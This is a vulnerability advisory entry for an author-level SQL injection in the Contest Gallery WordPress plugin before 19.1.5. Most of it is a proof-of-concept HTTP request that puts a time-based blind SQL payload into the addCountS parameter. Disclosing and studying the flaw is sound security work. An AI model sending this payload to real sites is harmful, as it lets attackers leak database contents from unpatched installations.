Lucene search

K
wpvulndbDaniel KrohmerWPVDB-ID:6E7DE2BB-5F71-4C27-AE79-4F6B2BA7F86F
HistoryDec 05, 2022 - 12:00 a.m.

Contest Gallery < 19.1.5 - Author+ SQL Injection

2022-12-0500:00:00
Daniel Krohmer
wpscan.com
4
sql injection
contest gallery
plugin
unauthorized access

EPSS

0.001

Percentile

36.8%

The plugins do not escape the addCountS POST parameter before concatenating it to an SQL query in 4_activate.php. This may allow malicious users with at least author privilege to leak sensitive information from the site’s database.

PoC

POST /wp-admin/admin-ajax.php HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost:8080/wp-admin/admin.php?page=contest-gallery%2Findex.php X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------19123588403344585440977856331 Content-Length: 2041 Origin: http://localhost:8080 Connection: close Cookie: wordpress_37d007a56d816107ce5b52c10342db37=pegasus%7C1668532775%7Ce9naGH0Y1x4WXb9vxCjC8JDEhkEcfRIJuC2uoLiJUrE%7Ce93774011f8915e8d1b69955e8c50a905c9040c9c17efcca7b42f24fb32f43e2; wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=pegasus%7C1668532775%7Ce9naGH0Y1x4WXb9vxCjC8JDEhkEcfRIJuC2uoLiJUrE%7C2bc19f40221c8d9c3d9219517701a229fe9080215045fe6a050c6d9b594282b3; wp-settings-time-5=1668467252; wp-settings-5=libraryContent%3Dbrowse Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------19123588403344585440977856331 Content-Disposition: form-data; name=“cgGalleryFormSubmit” 1 -----------------------------19123588403344585440977856331 Content-Disposition: form-data; name=“action” post_cg_gallery_view_control_backend -----------------------------19123588403344585440977856331 Content-Disposition: form-data; name=“cgGalleryHash” 355b5e0384230f74e41bc47f47d94aef -----------------------------19123588403344585440977856331 Content-Disposition: form-data; name=“cg_id” 1 -----------------------------19123588403344585440977856331 Content-Disposition: form-data; name=“cg_start” -----------------------------19123588403344585440977856331 Content-Disposition: form-data; name=“cg_step” 10 -----------------------------19123588403344585440977856331 Content-Disposition: form-data; name=“cg_order” custom -----------------------------19123588403344585440977856331 Content-Disposition: form-data; name=“cgVersionScripts” 19.1.4.1 -----------------------------19123588403344585440977856331 Content-Disposition: form-data; name=“cg_search” -----------------------------19123588403344585440977856331 Content-Disposition: form-data; name=“addCountS[1//AND//(SELECT//7741//FROM/**/(SELECT(SLEEP(5)))hlAf)]” 6 -----------------------------19123588403344585440977856331 Content-Disposition: form-data; name=“cg_email[2]” [email protected] -----------------------------19123588403344585440977856331 Content-Disposition: form-data; name=“cg_image_name[2]” 10x-featured-social-media-image-size -----------------------------19123588403344585440977856331 Content-Disposition: form-data; name=“chooseAction1” 1 -----------------------------19123588403344585440977856331 Content-Disposition: form-data; name=“cgBackendHash” e12e8782da8ac6c4f1725d81a9811524 -----------------------------19123588403344585440977856331 Content-Disposition: form-data; name=“cgIsRealFormSubmit” true -----------------------------19123588403344585440977856331–

EPSS

0.001

Percentile

36.8%

Related for WPVDB-ID:6E7DE2BB-5F71-4C27-AE79-4F6B2BA7F86F